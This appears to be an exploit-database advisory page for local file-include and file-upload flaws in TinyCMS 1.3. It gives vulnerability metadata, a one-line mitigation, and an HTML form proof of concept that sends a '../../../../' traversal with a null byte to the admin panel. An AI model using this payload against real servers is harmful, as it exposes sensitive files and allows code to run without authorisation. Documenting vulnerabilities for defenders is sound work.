header-logo
Suggest Exploit
vendor:
TinyCMS
by:
SecurityFocus
7,5
CVSS
HIGH
Local File-Include Vulnerabilities
98
CWE
Product Name: TinyCMS
Affected Version From: TinyCMS 1.3
Affected Version To: TinyCMS 1.3
Patch Exists: YES
Related CWE: N/A
CPE: a:tinycms:tinycms
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2012

TinyCMS Multiple Local File-Include Vulnerabilities

An attacker can exploit these issues to upload arbitrary files onto the web server, execute arbitrary local files within the context of the web server, and obtain sensitive information.

Mitigation:

Ensure that user-supplied input is properly validated and filtered before being used in file operations.
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/53761/info
  
TinyCMS is prone to multiple local file-include vulnerabilities and an arbitrary-file-upload vulnerability.
  
An attacker can exploit these issues to upload arbitrary files onto the web server, execute arbitrary local files within the context of the web server, and obtain sensitive information.
  
TinyCMS 1.3 is vulnerable; other versions may also be affected. 

<form action='http://www.example.com/admin/admin.php?view=admin&do=../../../../[ LFI ]%00' method='post'>
<input type='submit' value='Get/Include Local File'>
</form>

Navigation

Suggest Exploit

Services By CQR